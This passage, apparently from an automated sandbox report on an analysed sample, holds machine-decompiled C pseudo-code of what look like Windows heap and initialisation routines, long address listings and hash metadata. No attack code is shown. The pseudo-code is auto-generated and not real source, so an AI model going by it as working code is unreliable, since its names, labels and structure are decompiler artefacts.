				if( *((intOrPtr*)(__ecx + 0x38)) != 0 ||  *((intOrPtr*)(__ecx + 0x30)) != 0 ||  *((intOrPtr*)(__ecx + 0x3c)) != 0 ||  *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t259 = _a8;
					if(_t259 != 0) {
						_t125 = E1D755D90(_t195,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t259 + 0x0000001f >> 0x00000003 & 0x1ffffffc);
						_v24 = _t125;
						if(_t125 != 0) {
							_t194 = _a4;
							_v32 = _t259;
							_v28 = _t125;
							if( *(_t260 + 0x38) == 0) {
								L25:
								_t235 =  *(_t260 + 0x30);
								_v16 = _t235;
								if(_t235 == 0) {
									L36:
									if( *(_t260 + 0x3c) == 0) {
										L40:
										if( *((intOrPtr*)(_t260 + 0x34)) == 0) {
											L44:
											if( *((intOrPtr*)(_t260 + 0x48)) == 0) {
												L48:
												_t261 = 0;
												L49:
												E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v24);
												goto L50;
											}
											if(E1D7C7DD0(_t194, _t259,  *((intOrPtr*)(_t260 + 0x48)), 8,  &_v32) == 0) {
												L11:
												_t261 = 0xc0000001;
												goto L49;
											}
											_t198 =  *((intOrPtr*)(_t260 + 0x48));
											_t130 =  *_t198;
											if( *_t198 < 8) {
												goto L11;
											}
											_t117 = _t198 + 8; // 0x8
											if(E1D7C7DD0(_t194, _t259, _t117, _t130 + 0xfffffff8,  &_v32) == 0) {
												goto L11;
											}
											goto L48;
										}
										_t200 = 0x10;
										_v8 = _t200;
										if(E1D7C7DD0(_t194, _t259,  *((intOrPtr*)(_t260 + 0x34)), _t200,  &_v32) == 0 || E1D774CF8( &_v8,  *( *((intOrPtr*)(_t260 + 0x34)) + 0xc) * 0x8c,  *( *((intOrPtr*)(_t260 + 0x34)) + 0xc) * 0x8c >> 0x20) < 0 || E1D7C7DD0(_t194, _t259,  *((intOrPtr*)(_t260 + 0x34)) + 0x10, _v8,  &_v32) == 0) {
											goto L11;
										} else {
											goto L44;
										}
									}
									_t205 = 4;
									_v8 = _t205;
									if(E1D7C7DD0(_t194, _t259,  *(_t260 + 0x3c), _t205,  &_v32) == 0) {
										goto L11;
									}
									_t207 = 0x24;
									if(E1D774CF8( &_v8,  *( *(_t260 + 0x3c)) * _t207,  *( *(_t260 + 0x3c)) * _t207 >> 0x20) < 0 || E1D7C7DD0(_t194, _t259,  &(( *(_t260 + 0x3c))[1]), _v8,  &_v32) == 0) {
										goto L11;
									} else {
										goto L40;
									}
								}
								if((_v20 & 0x00000100) == 0) {
									_v8 = 4;
									if(E1D7C7DD0(_t194, _t259, _t235, 4,  &_v32) == 0 || E1D774CF8( &_v8,  *( *(_t260 + 0x30)) * 0x11c,  *( *(_t260 + 0x30)) * 0x11c >> 0x20) < 0 || E1D7C7DD0(_t194, _t259,  &(( *(_t260 + 0x30))[1]), _v8,  &_v32) == 0) {
										goto L11;
									} else {
										goto L36;
									}
								}
								while(E1D7C7DD0(_t194, _t259, _t235, 2,  &_v32) != 0) {
									_t249 = _v16;
									if( *_t249 == 0) {
										L31:
										_t215 =  *_t249 & 0x0000ffff;
										_t235 = _t249 + _t215;
										_v16 = _t249 + _t215;
										if(_t215 != 0) {
											continue;
										}
										goto L36;
									}
									if(E1D7C7DD0(_t194, _t259,  &(_t249[1]), 0x12a,  &_v32) == 0) {
										goto L11;
									}
									_t249 = _v16;
									goto L31;
								}
								goto L11;
							}
							_v8 = 4;
							if(E1D7C7DD0(_t194, _t259,  *(_t260 + 0x38), 4,  &_v32) != 0) {
								_t218 = 0x40;
								if(E1D774CF8( &_v8,  *( *(_t260 + 0x38)) * _t218,  *( *(_t260 + 0x38)) * _t218 >> 0x20) < 0 || E1D7C7DD0(_t194, _t259,  &(( *(_t260 + 0x38))[1]), _v8,  &_v32) == 0) {
									goto L11;
								} else {
									_t221 =  *(_t260 + 0x38);
									_t180 = 0;
									_t254 = 0;
									_v16 = 0;
									if( *_t221 <= 0) {
										goto L25;
									}
									_v12 = 0;
									do {
										_t222 =  *(_t180 +  &(_t221[7]));
										if( *(_t180 +  &(_t221[7])) == 0) {
											L20:
											_t224 =  *(_t180 +  &(( *(_t260 + 0x38))[6]));
											if( *(_t180 +  &(( *(_t260 + 0x38))[6])) == 0) {
												goto L24;
											}
											_t226 = 0x40;
											if(E1D774CF8( &_v8, _t224 * _t226, _t224 * _t226 >> 0x20) < 0 || E1D7C7DD0(_t194, _t259,  *((intOrPtr*)(_v12 +  &(( *(_t260 + 0x38))[0xf]))), _v8,  &_v32) == 0) {
												goto L11;
											} else {
												_t180 = _v12;
												_t254 = _v16;
												goto L24;
											}
										}
										_t230 = 0x10;
										if(E1D774CF8( &_v8, _t222 * _t230, _t222 * _t230 >> 0x20) < 0 || E1D7C7DD0(_t194, _t259,  *((intOrPtr*)(_v12 +  &(( *(_t260 + 0x38))[0x10]))), _v8,  &_v32) == 0) {
											goto L11;
										} else {
											_t180 = _v12;
											_t254 = _v16;
											goto L20;
										}
										L24:
										_t225 = 0x40;
										_t180 = _t180 + _t225;
										_t254 =  &(_t254[0]);
										_t221 =  *(_t260 + 0x38);
										_v16 = _t254;
										_v12 = _t180;
									} while (_t254 <  *_t221);
									goto L25;
								}
							}
							goto L11;
						}
						return 0xc000009a;
					}
					_t261 = 0xc0000001;
					goto L50;
				} else {
					_t261 = 0;
					L50:
					return _t261;
				}
			}




























                                                                                                                              0x1d7c7ec3
                                                                                                                              0x1d7c7ecd
                                                                                                                              0x1d7c7ecf
                                                                                                                              0x1d7c7ed8
                                                                                                                              0x1d7c7ef0
                                                                                                                              0x1d7c7ef5
                                                                                                                              0x1d7c7f18
                                                                                                                              0x1d7c7f1d
                                                                                                                              0x1d7c7f22
                                                                                                                              0x1d7c7f32
                                                                                                                              0x1d7c7f35
                                                                                                                              0x1d7c7f38
                                                                                                                              0x1d7c7f3b
                                                                                                                              0x1d7c8058
                                                                                                                              0x1d7c8058
                                                                                                                              0x1d7c805b
                                                                                                                              0x1d7c8060
                                                                                                                              0x1d7c811d
                                                                                                                              0x1d7c8121
                                                                                                                              0x1d7c817d
                                                                                                                              0x1d7c8181
                                                                                                                              0x1d7c81e0
                                                                                                                              0x1d7c81e4
                                                                                                                              0x1d7c822b
                                                                                                                              0x1d7c822b
                                                                                                                              0x1d7c822d
                                                                                                                              0x1d7c823c
                                                                                                                              0x00000000
                                                                                                                              0x1d7c823c
                                                                                                                              0x1d7c81fa
                                                                                                                              0x1d7c7f5e
                                                                                                                              0x1d7c7f5e
                                                                                                                              0x00000000
                                                                                                                              0x1d7c7f5e
                                                                                                                              0x1d7c8200
                                                                                                                              0x1d7c8203
                                                                                                                              0x1d7c8208
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c8216
                                                                                                                              0x1d7c8225
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c8225
                                                                                                                              0x1d7c8185
                                                                                                                              0x1d7c8189
                                                                                                                              0x1d7c819c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c819c
                                                                                                                              0x1d7c8125
                                                                                                                              0x1d7c8129
                                                                                                                              0x1d7c813c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c8147
                                                                                                                              0x1d7c8158
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c8158
                                                                                                                              0x1d7c806d
                                                                                                                              0x1d7c80c4
                                                                                                                              0x1d7c80da
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c80da
                                                                                                                              0x1d7c806f
                                                                                                                              0x1d7c8087
                                                                                                                              0x1d7c808f
                                                                                                                              0x1d7c80b2
                                                                                                                              0x1d7c80b2
                                                                                                                              0x1d7c80b5
                                                                                                                              0x1d7c80b7
                                                                                                                              0x1d7c80bd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c80bf
                                                                                                                              0x1d7c80a9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c80af
                                                                                                                              0x00000000
                                                                                                                              0x1d7c80af
                                                                                                                              0x00000000
                                                                                                                              0x1d7c806f
                                                                                                                              0x1d7c7f44
                                                                                                                              0x1d7c7f5c
                                                                                                                              0x1d7c7f6d
                                                                                                                              0x1d7c7f7e
                                                                                                                              0x00000000
                                                                                                                              0x1d7c7f9b
                                                                                                                              0x1d7c7f9b
                                                                                                                              0x1d7c7f9e
                                                                                                                              0x1d7c7fa0
                                                                                                                              0x1d7c7fa2
                                                                                                                              0x1d7c7fa7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c7fad
                                                                                                                              0x1d7c7fb0
                                                                                                                              0x1d7c7fb0
                                                                                                                              0x1d7c7fb6
                                                                                                                              0x1d7c7ff5
                                                                                                                              0x1d7c7ff8
                                                                                                                              0x1d7c7ffe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7c8004
                                                                                                                              0x1d7c8013
                                                                                                                              0x00000000
                                                                                                                              0x1d7c803b
                                                                                                                              0x1d7c803b
                                                                                                                              0x1d7c803e
                                                                                                                              0x00000000
                                                                                                                              0x1d7c803e
                                                                                                                              0x1d7c8013
                                                                                                                              0x1d7c7fbc
                                                                                                                              0x1d7c7fcb
                                                                                                                              0x00000000
                                                                                                                              0x1d7c7fef
                                                                                                                              0x1d7c7fef
                                                                                                                              0x1d7c7ff2
                                                                                                                              0x00000000
                                                                                                                              0x1d7c7ff2
                                                                                                                              0x1d7c8041
                                                                                                                              0x1d7c8043
                                                                                                                              0x1d7c8044
                                                                                                                              0x1d7c8046
                                                                                                                              0x1d7c8047
                                                                                                                              0x1d7c804a
                                                                                                                              0x1d7c804d
                                                                                                                              0x1d7c8050
                                                                                                                              0x00000000
                                                                                                                              0x1d7c7fb0
                                                                                                                              0x1d7c7f7e
                                                                                                                              0x00000000
                                                                                                                              0x1d7c7f5c
                                                                                                                              0x00000000
                                                                                                                              0x1d7c7f24
                                                                                                                              0x1d7c7ef7
                                                                                                                              0x00000000
                                                                                                                              0x1d7c7ee9
                                                                                                                              0x1d7c7ee9
                                                                                                                              0x1d7c8241
                                                                                                                              0x00000000
                                                                                                                              0x1d7c8241

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 82ba5b9f8610eb304a18b85e88e5207c24ca6e5808f40511664fe3833c6a2461
                                                                                                                              • Instruction ID: a07cd23a7138a15bc7f23466f3479798201abd6da80363c7a31e88cdab5d0c4c
                                                                                                                              • Opcode Fuzzy Hash: 82ba5b9f8610eb304a18b85e88e5207c24ca6e5808f40511664fe3833c6a2461
                                                                                                                              • Instruction Fuzzy Hash: D3B1C675A00606AFDF14CF54C984EBBF3BAEF84324F50445EAA06AB690DB35E905CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D781763 Relevance: .3, Instructions: 322COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 87%
                                                                                                                              			E1D781763(intOrPtr __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t156;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t187;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t195;
				signed char _t199;
				intOrPtr* _t208;
				intOrPtr _t209;
				intOrPtr _t210;
				intOrPtr _t211;
				intOrPtr* _t212;
				intOrPtr* _t213;
				void* _t233;
				signed int _t236;
				intOrPtr _t242;
				signed int _t243;
				signed int _t246;
				signed int _t250;
				intOrPtr _t253;
				signed int _t255;
				intOrPtr _t260;
				signed int _t261;

				_v20 = __edx;
				_t251 = _a8;
				_v16 = __ecx;
				_v12 = 1;
				if(_a8 != 0) {
					E1D811933(_t251, _a12,  &_a4,  &_v12);
				}
				while(1) {
					_t236 =  *0x7ffe0018;
					_t246 =  *0x7FFE0014;
					_t156 =  *((intOrPtr*)(0x7ffe001c));
					if(_t236 == _t156) {
						break;
					}
					asm("pause");
				}
				_t260 = _v16;
				_v56 = _t246;
				_v52 = _t236;
				if( *((intOrPtr*)(_t260 + 0x28)) != 2) {
					__eflags =  *((intOrPtr*)(_t260 + 0x28)) - 3;
					if( *((intOrPtr*)(_t260 + 0x28)) != 3) {
						_v40 = _v40 & 0x00000000;
						_v36 = _v36 & 0x00000000;
						E1D76BC50( &_v40);
						_v48 = _v40;
						_v44 = _v36;
					} else {
						asm("rdtsc");
						_v48 = _t156;
						_v44 = _t246;
					}
					goto L7;
				} else {
					while(1) {
						_t236 =  *0x7ffe0018;
						_t250 =  *0x7FFE0014;
						if(_t236 ==  *0x7ffe001c) {
							break;
						}
						asm("pause");
					}
					_t260 = _v16;
					_v48 = _t250;
					_v44 = _t236;
					L7:
					_t164 = E1D755D90(_t236,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x188 + _a4 * 4);
					_t253 = _a8;
					_t233 = _t164;
					if(_t233 == 0) {
						L28:
						return 0;
					}
					_t169 = E1D755D90(_t236,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _a4 << 2);
					 *(_t233 + 0x178) = _t169;
					if(_t169 == 0) {
						L46:
						_t261 = 0;
						__eflags = 0;
						L47:
						__eflags =  *(_t233 + 0x64);
						if( *(_t233 + 0x64) != 0) {
							_push( *(_t233 + 0x64));
							E1D782A80();
							 *(_t233 + 0x64) = _t261;
						}
						__eflags =  *(_t233 + 0x60);
						if( *(_t233 + 0x60) != 0) {
							_push( *(_t233 + 0x60));
							E1D782A80();
							 *(_t233 + 0x60) = _t261;
						}
						_t170 =  *(_t233 + 0x164);
						__eflags = _t170;
						if(_t170 != 0) {
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t261, _t170);
						}
						_t171 =  *(_t233 + 0x178);
						__eflags = _t171;
						if(_t171 != 0) {
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t261, _t171);
						}
						E1D77E4BC(_t233);
						_t147 = _t233 + 0x6c; // 0x6c
						E1D753B90(_t147);
						_t148 = _t233 + 0x74; // 0x74
						E1D753B90(_t148);
						_t149 = _t233 + 0x7c; // 0x7c
						E1D753B90(_t149);
						E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t261, _t233);
						goto L28;
					}
					if(_t253 != 0) {
						_t238 = _t233;
						_t254 = _v12;
						_t187 = E1D8117BC(_t233, _v12, _t253, _a12);
						__eflags = _t187;
						if(_t187 != 0) {
							goto L46;
						}
						_t191 = E1D755D90(_t238,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, (_t254 & 0x0000ffff) * 0xc);
						 *(_t233 + 0x164) = _t191;
						__eflags = _t191;
						if(__eflags == 0) {
							goto L46;
						}
						_t255 = _a4;
						L12:
						_t192 =  *(_t260 + 0x30);
						_t274 = _t192;
						if(_t192 != 0) {
							__eflags = _t192 - 0x4000;
							if(__eflags > 0) {
								 *(_t260 + 0x30) = 0x4000;
								_t192 = 0x4000;
							}
							_t193 = _t192 << 0xa;
						} else {
							_t193 = 0x1000;
						}
						 *(_t233 + 0x8c) = _t193;
						_t32 = _t233 + 0x6c; // 0x6c
						_push( *((intOrPtr*)(_t260 + 0x94)));
						_t195 = E1D7640F0(_t233, _t255, _t260, _t274);
						_t275 = _t195;
						if(_t195 == 0 || E1D781A3B(_t260,  *((intOrPtr*)(_t260 + 0x60)), _t275,  &_v28) != 0) {
							goto L46;
						} else {
							if(( *(_t260 + 0x40) & 0x00004000) != 0) {
								 *((intOrPtr*)(_t233 + 0x11c)) = 0x1d8341d8;
							} else {
								if(( *(_t260 + 0x40) & 0x00008000) != 0) {
									_t125 = _t233 + 0x120; // 0x120
									 *((intOrPtr*)(_t233 + 0x11c)) = _t125;
								}
							}
							_t241 = 0x800;
							 *((intOrPtr*)(_t233 + 0x14)) = _v20;
							 *(_t233 + 0x88) = _t255;
							 *(_t233 + 0xd4) = 0x800;
							 *((intOrPtr*)(_t233 + 0x2c)) = 0xffff;
							 *((intOrPtr*)(_t233 + 0x28)) = 0xc00d0000;
							 *((intOrPtr*)(_t233 + 0x24)) = 0xc0120000;
							_t199 =  *(_t260 + 0x40);
							if((_t199 & 0x00000400) != 0) {
								_t241 = 0xc00;
								 *(_t233 + 0xd4) = 0xc00;
								goto L22;
							} else {
								if((_t199 & 0x00000002) == 0) {
									__eflags = _t199 & 0x00000008;
									if((_t199 & 0x00000008) == 0) {
										__eflags = _t199 & 0x00000001;
										if((_t199 & 0x00000001) == 0) {
											L22:
											_t242 = _v16;
											 *(_t233 + 0xd4) =  *(_t260 + 0x40) & 0x34133024 | _t241;
											 *((intOrPtr*)(_t233 + 0x118)) =  *((intOrPtr*)(_t260 + 0x6c));
											 *((intOrPtr*)(_t233 + 0xa0)) =  *((intOrPtr*)(_t233 + 0x9c));
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											_t261 = 0;
											 *((intOrPtr*)(_t233 + 0xd0)) =  *((intOrPtr*)(_t242 + 0x3c));
											 *((intOrPtr*)(_t233 + 0x94)) =  *((intOrPtr*)(_t242 + 0x38));
											 *((intOrPtr*)(_t233 + 0x98)) =  *((intOrPtr*)(_t242 + 0x34));
											_t73 = _t233 + 0xa4; // 0xa4
											_t208 = _t73;
											 *((intOrPtr*)(_t208 + 4)) = _t208;
											 *_t208 = _t208;
											_t75 = _t233 + 0xb4; // 0xb4
											_t209 = _t75;
											 *((intOrPtr*)(_t233 + 0xb4)) = 0;
											 *((intOrPtr*)(_t233 + 0xac)) = _t209;
											 *((intOrPtr*)(_t233 + 0xb0)) = _t209;
											_t79 = _t233 + 0xc0; // 0xc0
											_t210 = _t79;
											 *((intOrPtr*)(_t233 + 0xc0)) = 0;
											 *((intOrPtr*)(_t233 + 0xb8)) = _t210;
											 *((intOrPtr*)(_t233 + 0xbc)) = _t210;
											_t83 = _t233 + 0xcc; // 0xcc
											_t211 = _t83;
											 *((intOrPtr*)(_t233 + 0xcc)) = 0;
											 *((intOrPtr*)(_t233 + 0xc4)) = _t211;
											 *((intOrPtr*)(_t233 + 0xc8)) = _t211;
											_t87 = _t233 + 0x14c; // 0x14c
											_t212 = _t87;
											 *((intOrPtr*)(_t212 + 4)) = _t212;
											 *_t212 = _t212;
											_t89 = _t233 + 0x154; // 0x154
											_t213 = _t89;
											 *((intOrPtr*)(_t213 + 4)) = _t213;
											 *_t213 = _t213;
											_push(0);
											 *((intOrPtr*)(_t233 + 0x10)) =  *((intOrPtr*)(_t242 + 0x28));
											_push(1);
											 *((intOrPtr*)(_t233 + 0x40)) =  *((intOrPtr*)(_t242 + 0x60));
											_push(0);
											 *((intOrPtr*)(_t233 + 0x100)) =  *((intOrPtr*)(_t242 + 0x4c));
											_t97 = _t233 + 0x60; // 0x60
											_push(0x1f0003);
											if(E1D782E30() < 0) {
												goto L47;
											}
											_push(0);
											_push(1);
											_push(0);
											_push(0x1f0003);
											_t98 = _t233 + 0x64; // 0x64
											if(E1D782E30() < 0) {
												goto L47;
											}
											_t99 = _t233 + 0x48; // 0x48
											E1D76FBC0(_t99, 0, 0);
											 *((intOrPtr*)(_t233 + 0x44)) = 0;
											 *((intOrPtr*)(_t233 + 0xd8)) = 1;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											return _t233;
										}
										_t241 = 0x801;
										L21:
										 *(_t233 + 0xd4) = _t241;
										 *((intOrPtr*)(_t233 + 0x74)) = _v28;
										 *((intOrPtr*)(_t233 + 0x78)) = _v24;
										goto L22;
									}
									_t241 = 0x808;
									 *(_t233 + 0xd4) = 0x808;
									 *((intOrPtr*)(_t233 + 0x7c)) = _v28;
									 *((intOrPtr*)(_t233 + 0x80)) = _v24;
									goto L22;
								}
								_t241 = 0x802;
								goto L21;
							}
						}
					}
					_t255 = _a4;
					_t243 = 0;
					if(_t255 == 0) {
						goto L12;
					} else {
						goto L11;
					}
					do {
						L11:
						 *((short*)( *(_t233 + 0x178) + _t243 * 4)) = 0;
						 *( *(_t233 + 0x178) + 2 + _t243 * 4) = _t243;
						_t243 = _t243 + 1;
					} while (_t243 < _t255);
					goto L12;
				}
			}













































                                                                                                                              0x1d78176f
                                                                                                                              0x1d781773
                                                                                                                              0x1d781777
                                                                                                                              0x1d78177a
                                                                                                                              0x1d781780
                                                                                                                              0x1d7b9b84
                                                                                                                              0x1d7b9b84
                                                                                                                              0x1d781791
                                                                                                                              0x1d781791
                                                                                                                              0x1d781793
                                                                                                                              0x1d781795
                                                                                                                              0x1d781799
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d781a29
                                                                                                                              0x1d781a29
                                                                                                                              0x1d78179f
                                                                                                                              0x1d7817a2
                                                                                                                              0x1d7817a5
                                                                                                                              0x1d7817ac
                                                                                                                              0x1d7b9b8e
                                                                                                                              0x1d7b9b92
                                                                                                                              0x1d7b9ba1
                                                                                                                              0x1d7b9ba8
                                                                                                                              0x1d7b9bad
                                                                                                                              0x1d7b9bb5
                                                                                                                              0x1d7b9bbb
                                                                                                                              0x1d7b9b94
                                                                                                                              0x1d7b9b94
                                                                                                                              0x1d7b9b96
                                                                                                                              0x1d7b9b99
                                                                                                                              0x1d7b9b99
                                                                                                                              0x00000000
                                                                                                                              0x1d7817b2
                                                                                                                              0x1d7817b7
                                                                                                                              0x1d7817b7
                                                                                                                              0x1d7817b9
                                                                                                                              0x1d7817bf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d781a30
                                                                                                                              0x1d781a30
                                                                                                                              0x1d7817c5
                                                                                                                              0x1d7817c8
                                                                                                                              0x1d7817cb
                                                                                                                              0x1d7817ce
                                                                                                                              0x1d7817e4
                                                                                                                              0x1d7817e9
                                                                                                                              0x1d7817ec
                                                                                                                              0x1d7817f0
                                                                                                                              0x1d781a37
                                                                                                                              0x00000000
                                                                                                                              0x1d781a37
                                                                                                                              0x1d781808
                                                                                                                              0x1d78180d
                                                                                                                              0x1d781815
                                                                                                                              0x1d7b9c7c
                                                                                                                              0x1d7b9c7c
                                                                                                                              0x1d7b9c7c
                                                                                                                              0x1d7b9c7e
                                                                                                                              0x1d7b9c7e
                                                                                                                              0x1d7b9c82
                                                                                                                              0x1d7b9c84
                                                                                                                              0x1d7b9c87
                                                                                                                              0x1d7b9c8c
                                                                                                                              0x1d7b9c8c
                                                                                                                              0x1d7b9c8f
                                                                                                                              0x1d7b9c93
                                                                                                                              0x1d7b9c95
                                                                                                                              0x1d7b9c98
                                                                                                                              0x1d7b9c9d
                                                                                                                              0x1d7b9c9d
                                                                                                                              0x1d7b9ca0
                                                                                                                              0x1d7b9ca6
                                                                                                                              0x1d7b9ca8
                                                                                                                              0x1d7b9cb5
                                                                                                                              0x1d7b9cb5
                                                                                                                              0x1d7b9cba
                                                                                                                              0x1d7b9cc0
                                                                                                                              0x1d7b9cc2
                                                                                                                              0x1d7b9ccf
                                                                                                                              0x1d7b9ccf
                                                                                                                              0x1d7b9cd6
                                                                                                                              0x1d7b9cdb
                                                                                                                              0x1d7b9cdf
                                                                                                                              0x1d7b9ce4
                                                                                                                              0x1d7b9ce8
                                                                                                                              0x1d7b9ced
                                                                                                                              0x1d7b9cf1
                                                                                                                              0x1d7b9d01
                                                                                                                              0x00000000
                                                                                                                              0x1d7b9d01
                                                                                                                              0x1d78181d
                                                                                                                              0x1d7b9bc6
                                                                                                                              0x1d7b9bc9
                                                                                                                              0x1d7b9bd0
                                                                                                                              0x1d7b9bd5
                                                                                                                              0x1d7b9bd7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b9bef
                                                                                                                              0x1d7b9bf4
                                                                                                                              0x1d7b9bfa
                                                                                                                              0x1d7b9bfc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b9bfe
                                                                                                                              0x1d781848
                                                                                                                              0x1d781848
                                                                                                                              0x1d781850
                                                                                                                              0x1d781852
                                                                                                                              0x1d7b9c06
                                                                                                                              0x1d7b9c08
                                                                                                                              0x1d7b9c0a
                                                                                                                              0x1d7b9c0d
                                                                                                                              0x1d7b9c0d
                                                                                                                              0x1d7b9c0f
                                                                                                                              0x1d781858
                                                                                                                              0x1d781858
                                                                                                                              0x1d781858
                                                                                                                              0x1d78185d
                                                                                                                              0x1d781863
                                                                                                                              0x1d781866
                                                                                                                              0x1d78186d
                                                                                                                              0x1d781872
                                                                                                                              0x1d781874
                                                                                                                              0x00000000
                                                                                                                              0x1d781890
                                                                                                                              0x1d781897
                                                                                                                              0x1d7b9c17
                                                                                                                              0x1d78189d
                                                                                                                              0x1d7818a4
                                                                                                                              0x1d7b9c26
                                                                                                                              0x1d7b9c2c
                                                                                                                              0x1d7b9c2c
                                                                                                                              0x1d7818a4
                                                                                                                              0x1d7818ad
                                                                                                                              0x1d7818b2
                                                                                                                              0x1d7818b5
                                                                                                                              0x1d7818bb
                                                                                                                              0x1d7818c1
                                                                                                                              0x1d7818c8
                                                                                                                              0x1d7818cf
                                                                                                                              0x1d7818d6
                                                                                                                              0x1d7818de
                                                                                                                              0x1d7b9c37
                                                                                                                              0x1d7b9c3c
                                                                                                                              0x00000000
                                                                                                                              0x1d7818e4
                                                                                                                              0x1d7818e6
                                                                                                                              0x1d7b9c47
                                                                                                                              0x1d7b9c49
                                                                                                                              0x1d7b9c6a
                                                                                                                              0x1d7b9c6c
                                                                                                                              0x1d781901
                                                                                                                              0x1d78190e
                                                                                                                              0x1d781911
                                                                                                                              0x1d78191d
                                                                                                                              0x1d781929
                                                                                                                              0x1d78192f
                                                                                                                              0x1d781930
                                                                                                                              0x1d781931
                                                                                                                              0x1d781932
                                                                                                                              0x1d781936
                                                                                                                              0x1d781938
                                                                                                                              0x1d781946
                                                                                                                              0x1d78194f
                                                                                                                              0x1d781955
                                                                                                                              0x1d781955
                                                                                                                              0x1d78195b
                                                                                                                              0x1d78195e
                                                                                                                              0x1d781960
                                                                                                                              0x1d781960
                                                                                                                              0x1d781966
                                                                                                                              0x1d78196c
                                                                                                                              0x1d781972
                                                                                                                              0x1d781978
                                                                                                                              0x1d781978
                                                                                                                              0x1d78197e
                                                                                                                              0x1d781984
                                                                                                                              0x1d78198a
                                                                                                                              0x1d781990
                                                                                                                              0x1d781990
                                                                                                                              0x1d781996
                                                                                                                              0x1d78199c
                                                                                                                              0x1d7819a2
                                                                                                                              0x1d7819a8
                                                                                                                              0x1d7819a8
                                                                                                                              0x1d7819ae
                                                                                                                              0x1d7819b1
                                                                                                                              0x1d7819b3
                                                                                                                              0x1d7819b3
                                                                                                                              0x1d7819b9
                                                                                                                              0x1d7819bc
                                                                                                                              0x1d7819c1
                                                                                                                              0x1d7819c2
                                                                                                                              0x1d7819c8
                                                                                                                              0x1d7819ca
                                                                                                                              0x1d7819d0
                                                                                                                              0x1d7819d1
                                                                                                                              0x1d7819d7
                                                                                                                              0x1d7819da
                                                                                                                              0x1d7819e3
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7819e9
                                                                                                                              0x1d7819ea
                                                                                                                              0x1d7819ec
                                                                                                                              0x1d7819ed
                                                                                                                              0x1d7819ee
                                                                                                                              0x1d7819f9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d781a01
                                                                                                                              0x1d781a05
                                                                                                                              0x1d781a0a
                                                                                                                              0x1d781a12
                                                                                                                              0x1d781a1e
                                                                                                                              0x1d781a1f
                                                                                                                              0x1d781a20
                                                                                                                              0x1d781a21
                                                                                                                              0x00000000
                                                                                                                              0x1d781a21
                                                                                                                              0x1d7b9c72
                                                                                                                              0x1d7818ef
                                                                                                                              0x1d7818ef
                                                                                                                              0x1d7818f8
                                                                                                                              0x1d7818fe
                                                                                                                              0x00000000
                                                                                                                              0x1d7818fe
                                                                                                                              0x1d7b9c4b
                                                                                                                              0x1d7b9c50
                                                                                                                              0x1d7b9c59
                                                                                                                              0x1d7b9c5f
                                                                                                                              0x00000000
                                                                                                                              0x1d7b9c5f
                                                                                                                              0x1d7818ec
                                                                                                                              0x00000000
                                                                                                                              0x1d7818ec
                                                                                                                              0x1d7818de
                                                                                                                              0x1d781874
                                                                                                                              0x1d781823
                                                                                                                              0x1d781826
                                                                                                                              0x1d78182a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d78182c
                                                                                                                              0x1d78182c
                                                                                                                              0x1d781834
